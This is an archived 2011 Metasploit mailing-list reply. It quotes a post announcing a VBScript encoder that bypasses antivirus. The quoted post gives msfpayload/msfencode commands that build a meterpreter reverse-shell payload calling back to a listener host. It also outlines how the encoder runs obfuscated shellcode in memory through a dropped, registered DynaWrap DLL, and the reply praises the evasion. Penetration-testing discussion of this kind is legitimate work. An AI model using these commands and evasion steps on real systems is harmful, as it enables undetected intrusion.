metasploit-framework March 2011 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] Additional encoder option

Re: [framework] Additional encoder option 'vbsmem' for AV bypass

From: 5.K1dd <5.k1dd_at_nospam>
Date: Sat Mar 05 2011 - 15:35:11 GMT
To: framework@spool.metasploit.com

Nice! AV detection is the achilles heel of Metasploit. Efforts to
bypass detection are always appreciated. Thanks, Blair. To the
Metasploit Gods: Will this script be added to svn?

>
> Hi,
>
> I've submitted a feature request with a patch included which implements
> a new VBScript-based encoder for msfencode.
>
> https://www.metasploit.com/redmine/issues/3894
>
> You might want to use this if you find that your payloads are getting
> picked up by certain on access virus scanners...
>
> Full details are available in the ticket and included below the jump.
>
> Feedback or suggestions welcome.
>
> Thanks,
>
> Blair.
>
> -----------------------------------------------------------------
>
> == SUMMARY ==
>
> * New exe encoder option for metasploit (Adds "-t vbsmem" to msfencode)
>
> * Achieves 0/43 (no detection) on virustotal.com for arbitrary
> metasploit shellcode payloads. Straight revshell is 20/43.
>
> * Uses vbscript with DynaWrap COM control (dropped and registered) to
> directly execute shellcode in memory, without triggering on-access virus
> scanners.
>
> * Standard VBScript string obfuscation techniques are used to hide the
> actual shellcode from AV software.
>
> == Examples ==
>
> Reverse shell
>
> ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.120.1
> LPORT=4444 R | ./msfencode -t vbsmem > revshell.vbs
>
> Pop calc poc
>
> ./msfpayload windows/exec EXITFUNC=process CMD='calc.exe' R |
> ./msfencode -t vbsmem > popcalc.vbs
>
> == About ==
>
> The first version of this encoder was written during a pentesting
> engagement. The target was running Microsoft Forefront Endpoint
> Protection with on-access scanning. It was possible to run commands,
> but I just couldn't get a meterpreter shell on there. After a
> frustrating session of multiply encoding, repacking and so on, the
> shellcode kept getting picked up.
>
> Existing VBScript payloads are not themselves picked up by AV, but
> when they drop files on the target, on-access scanning detects the
> payloads.
>
> After noting that the existing VBScript payloads themselves aren't
> picked up (just when they drop), I decided to apply a trick from
> Didier Stevens to execute the shellcode directly, without dropping.
> See:
>
> http://blog.didierstevens.com/2010/02/08/excel-with-cmd-dll-regedit-dll/
>
> This encoder writes shellcode into a vbscript file which performs
> the following actions:
>
> * Drops Dynawrap.dll in TEMP
> * Manually registers the control under HKEY_CURRENT_USER
> * Uses DynaWrap.dll to call native APIs...
> o VirtualAlloc (make space)
> o WriteProcessMemory (copy shellcode)
> o CreateThread (execute)
>
> Standard VBScript string obfuscation techniques are used to hide the
> actual shellcode from AV software.
>
> == Licensing ==
>
> The Dynawrap control was written by Ton Plooy and Jeff Strong and
> published in WDJ. As I understand it, this code is in the public
> domain and has been used in other open-source projects.
>
> The vbsmem code is provided under the same licensing terms as the
> metasploit project.
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework